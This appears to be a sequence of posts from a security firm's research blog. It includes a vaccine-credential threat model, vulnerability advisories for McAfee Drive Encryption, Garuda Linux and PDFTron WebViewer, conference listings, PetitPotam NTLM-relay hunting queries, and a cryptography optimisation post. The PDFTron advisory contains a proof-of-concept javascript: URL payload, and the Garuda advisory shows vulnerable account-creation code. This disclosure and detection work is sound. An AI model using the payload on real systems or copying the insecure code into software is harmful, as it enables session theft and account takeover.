Since there is no real “choice” for the end user on which VCS to use, being dependent on the context in which it is needed, identification of which VCS to use often becomes moot. For instance, let’s say New York State mandates use of the Excelsior Pass as validation to enter a concert venue, and users are expected to acquire a credential before reaching the venue. Users couldn’t really select another VCS, as that would not be acceptable proof. The concert organizers may share a link to the legitimate NYS Excelsior Pass app/website, making finding the legitimate site easy for end users. There is a small likelihood of a user searching for the VCS themselves, either on the web or on mobile app stores, and ending up on a rogue site or app seeking to harvest their personal information. This is hardly a zero-chance possibility, and a quick search on the iOS and Android app stores already shows a number of apps which claim to be “vaccine credential passports” and “health credential vaults”, but seem of sketchy provenance.

It’s worth mentioning that – like so many internet-based software systems people have for the last several years been required to use to participate in anything from electronically filing their income taxes, to ordering pizza online from their favorite pizza shop, to car registration, to the purchase of event tickets for many theatres and sports games – this lack of choice means that users are forced to accept the privacy and data sharing policies of the specific VCS, without having a say in the matter (other than opting out entirely of participating in the activity that relies upon this system). This is an opportunity for VCS administrators to inspire trust in users by having clearly defined, restrictive privacy policies that reassure users of the privacy and security of their data. Vaccine credential systems which follow principles of data minimization (i.e. limiting data collection and disclosure to the minimum required to fulfill a specific purpose) are more likely to be trusted and adopted by users.

Phase 2: Acquiring a vaccine credential

Once a user has identified a legitimate health website or mobile app VCS, they would look to actually acquiring a vaccine credential. This is usually done by providing authentication data to the HealthSite to validate the user’s identity. Authentication information may include government-issued identifiers, such as the health insurance number for some systems in Canada and a NemID for Denmark’s Coronapas, or identity verification questions such as for New York State’s Excelsior Pass.

Cybersecurity considerations for vaccine credential acquisition are listed below.

  • Security of the connection between the HealthApp and HealthSite: Does the website/application use HTTPS with modern ciphers? Can an attacker eavesdrop or intercept communications between the user’s device and the HealthSite and obtain personal information or vaccination status?
  • Authentication to HealthSite: How does the HealthSite verify my identity before producing a vaccine credential for me? Can an attacker impersonate someone else and acquire a credential for them? Does the HealthSite inadvertently let an individual ascertain someone else’s vaccination status without their consent, or leverage an information leak that lets them acquire non-public information about another user?
  • General application security concerns on the HealthSite: Is the HealthSite and supporting infrastructure built with security in mind? Is the HealthSite secure against common attacks such as SQL Injection, Server Side Request Forgery, patched server software, etc. which may be leveraged to compromise the HealthSite or HealthApp?
  • Secure storage of the vaccine credential on the user device: Is the vaccine credential stored securely on the user device? Can rogue applications or users on the device gain access to stored credentials? Does the app cache excessive information that may be revealed on compromise of the application?

While these fall under common application security concerns, the secure storage aspect of the vaccine credential is worth going into in detail. After all, the vaccine credential is something that will be disclosed to external parties for verification – does it really need to be stored “securely”? The answer is: it depends! Depending on what information these credentials contain, and how they are validated, there might be a host of potential attacks and concerns unless the credential is securely stored – and that in turn depends on how securely the system has been designed and built.

Phase 3: Validation and security of the vaccine credential

Not all vaccine credentials are the same; though many use QR-code representation as a means of providing an easy way to visually display and scan credential information, that is not universally true, and the information they hold can be vastly different. The format of the vaccine credential seems to largely fall under two categories:

  1. A digitally signed object containing vaccination data, often a JSON payload, or
  2. A unique web URL or identifier to an online service that hosts the vaccination information

The Vaccine Credential Initiative’s SMART cards and W3C’s Verifiable Credentials are examples of the former, whereas credentials provided by the Dubai Health Authority are examples of the latter.

There are certain advantages and disadvantages to each approach:

Signed Digital Object:

  • Pros:
    • Signed objects can be validated offline, and the ScannerApp does not require a persistent connection to the health backend to verify credentials (a minimal sketch of this offline check appears after these lists)
    • If well-designed, contains a limited amount of information and will not reveal more if credential is disclosed
  • Cons:
    • Information cannot be updated on a signed credential once minted; updates to vaccination status require a new credential
    • If disclosure of cryptographic signing key for credential occurs, it allows arbitrary credential forgery and requires reissuing all vaccine credentials and updating ScannerApps

Unique web URL or identifier:

  • Pros:
    • Information referenced by credential can be updated without needing new credentials
    • Individual credentials can be revoked without affecting other credentials or requiring ScannerApp updates
    • Slightly less complicated system to manage; no need to “do cryptography correctly” or manage cryptographic signing keys
  • Cons:
    • Requires ScannerApp to be online and have access to the health backend
    • There is additional attack surface exposed in the form of an endpoint that displays vaccination status, and the connection between the ScannerApp and health backend
    • If disclosed, may grant persistent access to vaccination status and/or health records, if the system has not been designed with URL/identifier expiry or revocation in mind

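To make the signed-object approach concrete, the sketch below shows what offline validation can look like. This is a minimal illustration assuming an Ed25519 signature over a raw JSON payload and a pre-distributed issuer public key; real schemes such as SMART Health Cards define their own encoding (JWS) and key discovery, and the payload layout here is hypothetical.

import json

from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PublicKey


def validate_credential(payload: bytes, signature: bytes,
                        issuer_key: Ed25519PublicKey) -> dict:
    """Verify the issuer's signature offline, then parse the vaccination data."""
    try:
        # Raises InvalidSignature for forged or tampered credentials
        issuer_key.verify(signature, payload)
    except InvalidSignature:
        raise ValueError("credential was not signed by a trusted issuer")
    # Hypothetical payload layout, e.g. {"name": ..., "dob": ..., "status": ...}
    return json.loads(payload)

Note that no network access is needed at verification time; the trade-off, as listed above, is that a compromised signing key forces reissuing every credential.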

In both approaches, the amount of information disclosed by a vaccine credential is interesting to note from an end user perspective. If I, as an end user, want or need to use a vaccine credential before entry to a physical space, how much information am I disclosing to someone who scans my credential? If I need to flash my vaccine credential to the bouncer at a bar to gain entry, is that equivalent to me showing them my driver’s license for age verification? Or am I revealing more information than what is displayed in the app? Am I inadvertently sharing my email address, or phone number, or some other part of my medical history?

One would assume information in the vaccine credential includes, at a minimum, the user’s vaccination status, and their full name. Many also include the user’s birthdate, or a government-issued identifier; this is used in conjunction with a photo ID, such as a driver’s license, passport, or other government-issued identification, to prove identity of the individual presenting the vaccine credential. A good design principle seems to be one that adheres to data minimization, as mentioned earlier.

This is especially important when you consider the wide variety of businesses and entities that may scan your vaccine credential and ask for accompanying photo ID; whilst most folks have become comfortable with regularly flashing their driver’s license at bars and airports (and in doing so, disclosing their name, date of birth, and registered physical address, among other details), vaccine credentials may be required at a wider range of physical spaces. This could range from your neighborhood convenience stores and chain retail departments to pop-up event spaces; places that mostly never required identification to enter, but now might require government issued or verified identification.

Furthermore, from the perspective of a business or venue validating vaccine credentials, how much trust should I place in the credential presented by a user? Is the presented credential provably trustworthy, or is it a forged credential? In other words, what guarantees are provided that the individual presenting the credential is its actual owner, and that the credential is genuine and gives an accurate picture of the presenter’s vaccination status?

With these systems and concerns in mind, let’s talk about possible attack vectors and threats:

  • Information disclosed by vaccine credential: Does the vaccine credential adhere to principles of data minimization? Does it disclose excessive information beyond what is required to establish identity and vaccination information?
  • Privacy and recording credential verification events: A threat related to the above is privacy concerns while displaying your credential to a scanner:
    • Is the ScannerApp caching vaccine credentials or information it scans, which may be compromised in case of ScannerApp device compromise?
    • Is the ScannerApp sharing scan or credential information with third parties?
    • Is the business validating my credential using the “official” ScannerApp? Are they using their own homegrown version or a modified version to keep track of every individual accessing their space?

      Remember that these vaccine credentials are largely government-issued or verified in some manner, which means a high confidence in the name and identity of the person displaying the credential. Consider a scenario where an individual shares their vaccine credential and their driver’s license as accompanying identification to a bouncer at a bar; there isn’t a whole lot of additional information provided here, as normally they would display their driver’s license (containing their verified name and details) anyways as age verification proof. Now consider another scenario where the same credentials are needed to enter, say, Joe’s SuperMart. Normally, no identification would be provided, but now, they may be able to record the real name and age of every individual entering their physical space. This subtle increase in “surveillance” is hard to discount completely, and privacy-respecting ScannerApps will refrain from storing this information for longer than it is needed to verify the individual’s vaccination status.
  • Credential forgery and validation: How is the vaccine credential validated? Could someone create a forged credential without actually having been vaccinated, and attempt to bypass checks in the ScannerApp?
    • For signed objects, things to consider include:
      • Is the cryptographic signature correctly validated with the right cipher and public key, or could someone forge credentials and bypass validation with a malformed credential?
      • Is the cipher and key size used for signatures resistant to brute force and known attacks?
      • Is the private key used to sign the object securely managed?
      • Is the public key used for verification of the signature securely distributed to the ScannerApp?
    • For credentials that use a URL/identifier to an online system, concerns include:
      • Can the connection between Scanner app and online system be intercepted?
      • Is the URL or identifier guessable or enumerable? Could someone list or find credentials in the system? (A short sketch of issuing non-enumerable identifiers follows this list.)
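For the URL/identifier approach, one simple mitigation for the enumeration concern above is to issue identifiers with enough entropy that guessing is infeasible. A minimal sketch, with a hypothetical function name and assuming the identifier-to-record mapping lives server-side:

import secrets


def new_credential_identifier() -> str:
    # 32 random bytes (256 bits), URL-safe encoded: unlike sequential database
    # IDs, these cannot feasibly be guessed or enumerated
    return secrets.token_urlsafe(32)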

Final Thoughts

The security considerations outlined here are in no way exhaustive, and form a small but important part of the overall picture of concerns one would have when evaluating the security of a new public-facing health system. Hopefully this exercise helps form the basis of what to consider when using or assessing such systems. NCC Group is watching the evolution of these systems with great interest, and plans to apply and expand on the threat model above with a look at specific vaccine credential systems in future posts.

Technical Advisory – NULL Pointer Dereference in McAfee Drive Encryption (CVE-2021-23893)

4 October 2021 at 15:37
Vendor: McAfee
Vendor URL: https://kc.mcafee.com/corporate/index?page=content&id=sb10361
Versions affected: Prior to 7.3.0 HF1
Systems Affected: Windows OSs without NULL page protection 
Author: Balazs Bucsay <balazs.bucsay[ at ]nccgroup[.dot.]com> @xoreipeip
CVE Identifier: CVE-2021-23893
Risk: 8.8 - CWE-269: Improper Privilege Management

Summary

McAfee’s Complete Data Protection package contained the Drive Encryption (DE) software. This software was used to transparently encrypt the drive contents. The versions prior to 7.3.0 HF1 had a vulnerability in the kernel driver MfeEpePC.sys that could be exploited on certain Windows systems for privilege escalation or DoS.

Impact

Privilege Escalation vulnerability in a Windows system driver of McAfee Drive Encryption (DE) prior to 7.3.0 could allow a local non-admin user to gain elevated system privileges via exploiting an unutilized memory buffer.

Details

The Drive Encryption software’s kernel driver was loaded into the kernel at boot time, and certain IOCTLs were available to low-privileged users.

One of the available IOCTLs referenced an event object that was set to NULL before initialization. If the IOCTL was called at the right time, the procedure used NULL as an event and referenced the non-existent structure on the NULL page.

If the user mapped the NULL page and created a fake structure there that mimicked a real Event structure, it was possible to manipulate certain regions of memory and eventually execute code in the kernel.

Recommendation

Install or update to Drive Encryption 7.3.0 HF1, which has this vulnerability fixed.

Vendor Communication

February 24, 2021: Vulnerability was reported to McAfee

March 9, 2021: McAfee was able to reproduce the crash with the originally provided DoS exploit

October 1, 2021: McAfee released the new version of DE, which fixes the issue

Acknowledgements

Thanks to Cedric Halbronn for his support during the development of the exploit.

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity. 

Published date:  October 4, 2021

Written by:  Balazs Bucsay

Conference Talks – October 2021

30 September 2021 at 09:15

This month, members of NCC Group will be presenting their work at the following conferences:

  • Jennifer Fernick & external panelists, “Threatscape 2023 and Beyond: AI, Deep Fakes and Other Unexpected Challenges”, to be presented at MapleSec (Oct 6 2021)
  • Damon Small, “Which security role is right for me?”, to be presented at ShellCon (Oct 8 2021)
  • Brian Hong, “Sleight of ARM: Demystifying Intel Houdini”, to be presented at ToorCon (Oct 12 2021)
  • Damon Small, “Beyond the Scan: The Value Proposition of Vulnerability Assessment”, to be presented at UTINFOSEC Fall 2021 (Oct 14 2021)
  • Robert Seacord, “Secure Coding in C and C++”, to be presented at NDC TechTown 2021 (October 18-19 2021)
  • Sourya Biswas, “Security from Scratch: Reminiscing Being the 2nd Security Employee at a Startup”, to be presented at InfoSec World (Oct 25 2021)

Please join us!

Threatscape 2023 and Beyond: AI, Deep Fakes and Other Unexpected Challenges
Jennifer Fernick & external panelists
MapleSec
October 6 2021

Moderator

  • Darrin Horner, Regional Sales Manager with OKTA 

Panelists

  • Jennifer Fernick, SVP & Global Head of Research, NCC Group
  • Dr. Hadis Karimpour, Associate Professor and Chair in Secure and Reliable Networked Engineering Systems, University of Calgary
  • Cara Wolf, CEO, Ammolite Analytx


Which Security Role is Right for Me?
Damon Small
ShellCon
October 8 2021

Infosec is an industry of diverse professionals, and the roles available are equally diverse. Even after one decides to pursue a career in cyber security, navigating through the myriad job types that exist can be daunting. The speakers, Damon “ch3f” Small and Paul Love, will reflect on their decades of experience in the industry and offer guidance as to how a candidate can focus their job search in specific areas of infosec. From red team, to blue team, to consulting, compliance, and management, there is a role for everyone. Attendees will have ample time for Q&A after the speakers’ prepared remarks, will gain a greater understanding of professional opportunities that exist, and will learn how to determine which type of role may be best for themselves.


Sleight of ARM: Demystifying Intel Houdini
Brian Hong 
ToorCon
October 12 2021

In recent years, we have seen some of the major players in the industry switch from x86-based processors to ARM processors. Most notable is Apple, who has supported the transition to ARM from x86 with a binary translator, Rosetta 2, which has recently gotten the attention of many researchers and reverse engineers. However, you might be surprised to know that Intel has its own binary translator, Houdini, which runs ARM binaries on x86.
In this talk, we will discuss Intel’s proprietary Houdini translator, which is primarily used by Android on x86 platforms, such as higher-end Chromebooks and desktop Android emulators. We will start with a high-level discussion of how Houdini works and is loaded into processes. We will then dive into the low-level internals of the Houdini engine and memory model, including several security weaknesses it introduces into processes using it. Lastly, we will discuss methods to escape the Houdini environment, execute arbitrary ARM and x86, and write Houdini-targeted malware that bypasses existing platform analysis.

Beyond the Scan: The Value Proposition of Vulnerability Assessment
Damon Small
UTINFOSEC Fall 2021
October 14 2021

Vulnerability Assessment is, by some, regarded as one of the least “sexy” capabilities in information security. However, it is the presenter’s view that it is also a key component of any successful infosec program, and one that is often overlooked. Doing so serves an injustice to the organization and results in many missed opportunities to help ensure success in protecting critical information assets. The presenter will explore how Vulnerability Assessment can be leveraged “Beyond the Scan” and provide tangible value to not only the security team, but the entire business that it supports.

Secure Coding in C and C++
Robert Seacord
NDC TechTown 2021
October 18-19 2021

Secure Coding in C and C++ is a two day training course that provides a detailed explanation of common programming errors in C and C++ and describes how these errors can lead to code that is vulnerable to exploitation.

Security from Scratch: Reminiscing Being the 2nd Security Employee at a Startup
Sourya Biswas    
InfoSec World
October 25 2021

What happens when a small company equipped with the brand new security program you built suddenly becomes a not-so-small company successful enough to be targeted by cyber attacks? This case study will outline the security roll-out at a startup and reveal how they remained result-oriented even on a small budget. Attendees will leave with recommendations that have since been successfully implemented by multiple other lean startups, and applicable to anyone tasked with building or rebuilding enterprise cybersecurity, or working with limited funding.

Key Takeaways:

  • Understand the thought process of a new CISO at a company without a security program.    
  • Realize what a startup’s Board typically looks for in a new security program.
  • Understand how Defense in Depth is a viable approach towards implementing security from scratch.
  • Learn about some common gaps encountered assessing startups’ security postures.

Technical Advisory – Garuda Linux Insecure User Creation (CVE-2021-3784)

29 September 2021 at 15:39
Vendor: Garuda Linux
Vendor URL: https://garudalinux.org/ 
Versions affected: prior to commit 29b03856
Systems Affected: Garuda Linux user creation panel 
Author: Jesus Olmos <jesus.olmos[at]fox-it[dot]com>
CVE Identifier: CVE-2021-3784
Risk: 4.4 - Local user impersonation at the moment of user creation

Summary

Garuda is a modern Linux distribution based on Arch Linux with nice blur effects and icons. 

Garuda Linux performs insecure user creation and authentication, which allows a local attacker to impersonate a user account while it is being created. 

The user is created in two steps: 

  • First, the user is created without a password and without any account lock. 
  • Then, the password is set. 

Authentication is requested at each step, so there is enough of a delay between the steps to gain access to the unprotected account. 

Furthermore, the switch-user option allows access to the unprotected account using any random password. 

Impact

A local attacker can detect a user creation and install a backdoor to access that user account at any moment in the future. 

Details

Garuda Linux performs insecure user creation and authentication, which allows any local user to impersonate an account created via Garuda’s user management panel: 

"garuda settings manager" > "user accounts" 

In Linux, users are often created in two steps: 

  • Create the user without a password but with the account locked 
  • Set the password 

But in the case of Garuda there is no account lock. This is the code for step 1: 

args["arguments"] = QStringList() << "-m" << "-p" << "" << "-U" << "-G" << defaultUserGroups << username; 
installActionAdd.setArguments(args); 
KAuth::ExecuteJob* jobAdd = installActionAdd.execute(); 

This step generates an authentication pop-up, and so does step 2, when the password is set: 

args["arguments"] = QStringList() << username; 
args["writeArgs"] = QStringList() << password << password; 
installActionUsersChangePassword.setArguments(args); 
KAuth::ExecuteJob* jobChangePassword = installActionUsersChangePassword.execute(); 

Each KAuth action performs an elevation and shows the authentication pop-up, so in practice it appears twice. 

Between step1 and step2 the user is created without password and without account lock: 

  • shadow:   myuser::18841:0:99999:7:: 
  • passwd:   myuser:x:1003:1004::/home/myuser:/bin/bash 

Despite this momentarily insecure state of the created user, Garuda’s configuration doesn’t allow using the "su" command to switch to an account that has no password. 

But Garuda’s switch-user feature successfully authenticates to this account with any random password. 

Recommendation

The current download version is fixed, and also an upgrade is available. Users are recommended to upgrade to the most recent version.

In case of doubt, don’t use Garuda’s user creation panel; users can be created from the console. 

Vendor Communication

August 9 2021: The vulnerability was discovered during vacation. 

September 10 2021: A ticket was created on the vendor’s GitLab. 

September 10 2021: The vulnerability was fixed in commit 29b03856.

Acknowledgements

Thanks to the Garuda developers for quickly fixing the vulnerability. 

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity. 

Published date:  September 29 2021

Written by:  Jesus Olmos 

Detecting and Hunting for the PetitPotam NTLM Relay Attack

23 September 2021 at 18:34

Overview

During the week of July 19th, 2021, information security researchers published a proof-of-concept tool named “PetitPotam” that exploits a flaw in Microsoft Windows Active Directory Certificate Services via an NTLM relay attack.  The flaw allows an attacker to gain administrative privileges on an Active Directory Certificate Services server once on the network, for example after compromising a system with another exploit or malware.  

The following details are provided to assist organizations in detecting and threat hunting for this and other similar types of threats.

Preparation

The default settings of Windows logging often do not catch advanced threats.  Therefore, Windows Advanced Audit Logging must be optimally configured to detect, and to be able to threat hunt for, PetitPotam and similar attacks.

Organizations should have a standard procedure to configure the Windows Advanced Audit Policies as a part of a complete security program and have each Windows system collect locally significant events.  NCC Group recommends using the following resource to configure Windows Advanced Audit Policies:

Log rotation can be another major issue with Windows’ default log settings.  The default log sizes should be increased to support detection engineering and threat hunting.

Ideally, organizations should forward event logs to a log management or SIEM solution to operationalize detection alerts and provide a central console where threat hunting can be performed.  Alternatively, with optimally configured log sizes, teams can run tools such as PowerShell or LOG-MD to hunt for malicious activity against the local log data.

Detecting and Threat Hunting NTLM Relay Attacks

The PetitPotam attack targets Active Directory servers running certificate services, so this will be the focus of the detection and hunting.  Event log data is needed to detect or hunt for PetitPotam. The following settings and events can be used to detect this malicious activity:

Malicious Logins

PetitPotam will generate an odd login that can be used to detect and hunt for indications of execution.  To collect Event ID 4624, the Windows Advanced Audit Policy will need to have the following policy enabled:

  • Logon/Logoff – Audit Logon = Success and Failure

The following query logic can be used:

  • Event Log = Security
  • Event ID = 4624
  • User = ANONYMOUS LOGON
  • Authentication Package Name = NTLM*
  • Elevated Token = *1842

Sample Query

The following query is based on Elastic’s WinLogBeat version 7 agent.

  • "event.code"="4624" and winlog.event_data.AuthenticationPackageName="NTLM*" and winlog.event_data.ElevatedToken="*1842" | PackageName:=winlog.event_data.AuthenticationPackageName | Token:=winlog.event_data.ElevatedToken | WS_Name:=winlog.event_data.WorkstationName | LogonProcess:=winlog.event_data.LogonProcessName | LogonType:=winlog.event_data.LogonType | ProcessName:=winlog.event_data.ProcessName | UserName:=winlog.event_data.SubjectUserName | Domain:=winlog.event_data.SubjectDomainName | TargetDomain:=winlog.event_data.TargetDomainName | TargetUser:=winlog.event_data.TargetUserName | Task:=winlog.event_data.TargetUserName | table([event.code, @timestamp, host.name, event.outcome, WS_Name, UserName, Domain, Token, PackageName, LogonProcess, LogonType, ProcessName, TargetDomain, TargetUser, Task])

Malicious Share Access

PetitPotam will generate odd network share connections that can be used to detect and hunt for indications of execution.  To collect Event ID 5145, the Windows Advanced Audit Policy will need to have the following policy enabled:

  • Object Access – Audit Detailed File Share = Success
  • Object Access – Audit File Share = Success

The following query logic can be used:

  • Event Log = Security
  • Event ID = 5145
  • Object Name = *IPC*
  • Target Name = ("lsarpc" or "efsrpc" or "lsass" or "samr" or "netlogon")

Sample Query

The following query is based on Elastic’s WinLogBeat version 7 agent.

  • "event.code"="5145" and winlog.event_data.ShareName=*IPC* and ("lsarpc" or "efsrpc" or "lsass" or "samr" or "netlogon" or "srvsvc")
    | Status:= keywords[0] | Src_IP:= winlog.event_data.IpAddress | PID:= winlog.process.pid | UserName:=winlog.event_data.SubjectUserName | Domain:= winlog.event_data.SubjectDomainName | Target_File:= winlog.event_data.RelativeTargetName | Path:= winlog.event_data.ShareLocalPath | Share:= winlog.event_data.ShareName | ObjectType:=winlog.event_data.ObjectType
    | table([event.code, @timestamp, host.name, Status, Src_IP, PID, UserName, Domain, task, Path, Share, Target_File, ObjectType])

If you find any false positives, you may need to validate them and then exclude them from, or refine, the query.  We hope this information can assist your detection and threat hunting efforts against this and similar types of attacks.


Technical Advisory: PDFTron JavaScript URLs Allowed in WebViewer UI (CVE-2021-39307)

14 September 2021 at 13:52
Vendor: PDFTron
Vendor URL: https://www.pdftron.com/
Versions affected: WebViewer UI 8.0 or below
Systems Affected: Web applications hosting the affected software
Author: Liyun Li <liyun.li[at]nccgroup[dot]com>
CVE Identifier: CVE-2021-39307

Summary

PDFTron’s WebViewer UI 8.0 or below renders dangerous URLs as hyperlinks in supported documents, including JavaScript URLs, allowing the execution of arbitrary JavaScript code.

Impact

An attacker could steal a victim’s session tokens, log their keystrokes, steal private data, or perform privileged actions in the context of a victim’s session.

Details

JavaScript URLs are dangerous because they can be used to execute arbitrary JavaScript code when visited. Built-in PDF readers in modern browsers, such as Mozilla’s pdf.js, do not render code-execution-capable URLs as hyperlinks to avoid this issue.

To reproduce this issue, first create the following HTML document and save the rendered content as a PDF using a modern browser.

<h2><a href="javascript:document.write`
  <div>
    <form method='GET' action='https://nccgroup.com'>
      <input type='submit' value='NCC Group'>
    </form>
    <script>alert(document.domain)</script>
  </div>
`">Click me</a></h2>

After that, use the “d” parameter to include the uploaded PDF file (e.g. http://webviewer-instance/#d=https://domain.tld/test.pdf).

Support for rendering clickable JavaScript and data URLs should be removed.

Recommendation to Users

Upgrade WebViewer UI to 8.1, available at https://www.pdftron.com/documentation/web/download.

Vendor Communication

2021-08-16: Issue reported to PDFTron
2021-08-17: PDFTron confirmed the vulnerability
2021-08-23: PDFTron issued patch to nightly build
2021-09-09: PDFTron WebViewer 8.1 released 
2021-09-14: Advisory released by NCC Group

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published date:  September 14, 2021

Written by:  Liyun Li

Optimizing Pairing-Based Cryptography: Montgomery Multiplication in Assembly

10 September 2021 at 08:30

This is the second blog post in a new code-centric series about selected optimizations found in pairing-based cryptography. Pairing operations are foundational to the BLS Signatures central to Ethereum 2.0, the zero-knowledge arguments underpinning Filecoin, and a wide variety of other emerging applications.

While my prior blog series, “Pairing over BLS12-381,” implemented the entire pairing operation from start to finish in roughly 200 lines of high-level Haskell, this current blog series, “Optimizing Pairing-Based Cryptography” looks at lower-level performance optimizations in more operational systems. The first post in this series covered modular Montgomery arithmetic in Rust from start to finish. This second post takes the Montgomery multiplication algorithm developed in Rust even further to seek the maximum performance a modern x86-64 machine can deliver from an implementation hand-written in assembly language. Several specialized instructions and advanced micro-architectural features enabling increased parallelism result in a Montgomery multiplication routine running more than 15X faster than a generic Big Integer implementation.

Overview

Pairing-based cryptography is fascinating because it utilizes such a wide variety of concepts, algorithms, techniques and optimizations. For reference, the big picture on pairing can be reviewed in the prior series of blog posts listed below.

Pairing over BLS12-381, Part 1: Fields
Pairing over BLS12-381, Part 2: Curves
Pairing over BLS12-381, Part 3: Pairing!

This current blog post focuses on optimizing the most expensive of basic field arithmetic operations: modular multiplication. First, a reference function implemented in Rust with the BigUint library crate is presented alongside a similar reference function adapted for use with Montgomery-form operands. Second, a more optimized routine utilizing operands constructed solely from 64-bit unsigned integers and developed in the prior blog post is presented – this serves as the jumping-off point for assembly language optimization. Third, the complete assembly routine is developed and described with interspersed insights on CPU architecture, micro-architecture, and register allocation. This post then wraps up with some figure-of-merit benchmarking results that compare the various implementations.

All of the code is available, ready-to-run and ready-to-modify for your own experimentation. The code is nicely self-contained and understandable, with zero functional dependencies and minimal test/build complexity. On Ubuntu 20.04 with Rust, git and clang preinstalled, it is as simple as:

$ git clone https://github.com/nccgroup/pairing.git
$ cd pairing/mont2
$ RUSTFLAGS="--emit asm -C target-cpu=native" cargo bench

The Reference Operations

Rust, along with the BigUint library crate, makes the basic modular multiplication operation exceptionally easy to code. The excerpt below defines the BLS12-381 prime field modulus with the lazy_static macro and then proceeds to implement the modular multiplication function mul_biguint() using that fixed modulus. This reference function corresponds to the modular multiplication performance a generic application might achieve, and is used later as the benchmark baseline. [Code excerpt on GitHub]

As described in the prior blog post, the Montgomery multiplication algorithm has a lot more potential for performance optimization but uses operands in the Montgomery form ã = a · R mod N, where a is the normal value (or normal form), N is the MODULUS and R is 2³⁸⁴ in our scenario. When operands in Montgomery form are multiplied together, an instance of R⁻¹ needs to be factored into the calculation in order to maintain the result in correct Montgomery form. Thus, the actual operation is mont_mul(ã, b̃) = ã · b̃ · R⁻¹ mod N. The code below declares the R⁻¹ = R_INV constant as calculated in the prior blog post, utilizes the same MODULUS constant declared above, and so implements our mont_mul_biguint() Montgomery multiplication reference function. [Code excerpt on GitHub]
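Since the repository excerpt is not reproduced here, the following is a minimal pure-Python sketch of the same reference operations, using arbitrary-precision integers in place of BigUint; the helper names are ours and the constant values are elided:

# MODULUS is the BLS12-381 prime (value elided), R = 2**384, and
# R_INV = pow(R, -1, MODULUS) as derived in the prior post.

def to_mont(a: int, modulus: int) -> int:
    return (a << 384) % modulus            # a-tilde = a * R mod N

def mont_mul_reference(a_t: int, b_t: int, modulus: int, r_inv: int) -> int:
    return (a_t * b_t * r_inv) % modulus   # the R**-1 factor keeps Montgomery form

def from_mont(a_t: int, modulus: int, r_inv: int) -> int:
    return (a_t * r_inv) % modulus         # back to normal form

As a quick sanity check, from_mont(mont_mul_reference(to_mont(a, N), to_mont(b, N), N, R_INV), N, R_INV) equals (a * b) % N.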

Note that the above function currently has even worse performance characteristics than the prior baseline. This is due to the additional multiplication involving R_INV delivering an even larger input to the very expensive modular reduction operator which involves a division operation. However, it can serve as a more formalized definition of correct functionality, so it will be used internally to support the test code which compares actual versus expected results across different implementations. As an aside, recall that the extra expense of converting the operands to/from Montgomery form is expected to be amortized across many (hopefully now much faster) interim operations.

Montgomery Multiplication Using Rust’s Built-In Types

The primary issue with each of the above multiplication routines is the expensive division lurking underneath the modulo operator. The BigUint crate is wonderful in that it supports both arbitrary precision operands and moduli. However, this flexibility precludes some of the aggressive performance optimizations that can be implemented with fixed-size operands and a constant modulus.

The Rust code shown below from the prior blog post introduces the fixed data structure used for the operands. Operands consist of an array of six 64-bit unsigned integers, each known as a limb. This is followed by the ‘magic constant’ N_PRIME derived in the prior blog post for use in the reduction step, and then the complete Montgomery multiplication function using only Rust’s built-in operators and data types. [Code excerpt on GitHub]

There are three interesting and related things to observe in the code above.

  1. A temp array is declared on line 107 that is capable of holding twelve 64-bit limbs. Intuitively, that size makes sense since the overall operation involves a multiplication of two operands, where each operand consists of six 64-bit limbs, so a ‘double-width’ intermediate result is appropriate.
  2. The outer loop wraps a partial product step in the first inner loop followed by a reduction step in the second inner loop, and the outer loop index i always acts as a base address whenever the temp array is accessed. Looking more closely at the logic executed during each outer loop iteration, only seven limbs of the temp array are ever active, which is a noticeably smaller working set relative to the overall size of twelve in the temp declaration.
  3. As the outer loop iterates, the code essentially steps forward through the working set of the temp array from least significant toward most significant limb, never going fully backwards. In fact, incrementing the loop index i and using it as a base address means the least significant values are effectively falling away one at a time; the final result is derived from only the most significant six limbs of the temp array.

These three observations suggest that it is possible to elegantly implement the work done inside the outer loop within only a handful of active registers. The outer loop can then either iterate as shown or be unrolled, while it shifts the working set one step forward through the temp array each time.
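For readers without the repository at hand, here is a condensed pure-Python rendering of that structure; the line numbers in the observations above refer to the Rust code on GitHub, not to this sketch. Python’s big integers make the carry handling exact automatically, whereas the Rust version must manage 64-bit overflow explicitly. N_PRIME stands in for the ‘magic constant’ -N**-1 mod 2**64 from the prior post, and operands are little-endian lists of six 64-bit limbs:

MASK64 = (1 << 64) - 1

def mont_mul_limbs(a: list, b: list, n: list, n_prime: int) -> list:
    temp = [0] * 12                        # twelve limbs, only seven active at a time
    for i in range(6):
        carry = 0
        for j in range(6):                 # partial product step: temp += a * b[i]
            hilo = a[j] * b[i] + temp[i + j] + carry
            temp[i + j] = hilo & MASK64
            carry = hilo >> 64
        temp[i + 6] += carry
        m = (n_prime * temp[i]) & MASK64   # chosen so the reduction zeroes temp[i]
        carry = 0
        for j in range(6):                 # reduction step: temp += m * N
            hilo = m * n[j] + temp[i + j] + carry
            temp[i + j] = hilo & MASK64
            carry = hilo >> 64
        temp[i + 6] += carry
    # the least significant limbs have fallen away one per iteration; the result
    # is the top six limbs, still subject to a final conditional subtraction of N
    return temp[6:12]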

An Aside: CPU Architecture, Micro-architecture, and Register Allocation

Some basic foundation needs to be built prior to jumping into the assembly language implementation. While the term ‘CPU Architecture’ does not have a single, simple or perfectly agreed-upon definition, in this context it describes the higher-level software instruction set and programming model of a processor system – the programmer’s view. At a lower level, the term ‘CPU Micro-architecture’ then describes how a specific processor implementation is logically organized to execute that instruction set – these underlying mechanisms are largely hidden from the application programmer. Both areas have seen tremendous progress and greater complexity over time in the never ending quest for performance that largely comes from increased parallelism. There are a few things to observe for each topic, starting from the lower-level and working upwards.

CPU Micro-architecture

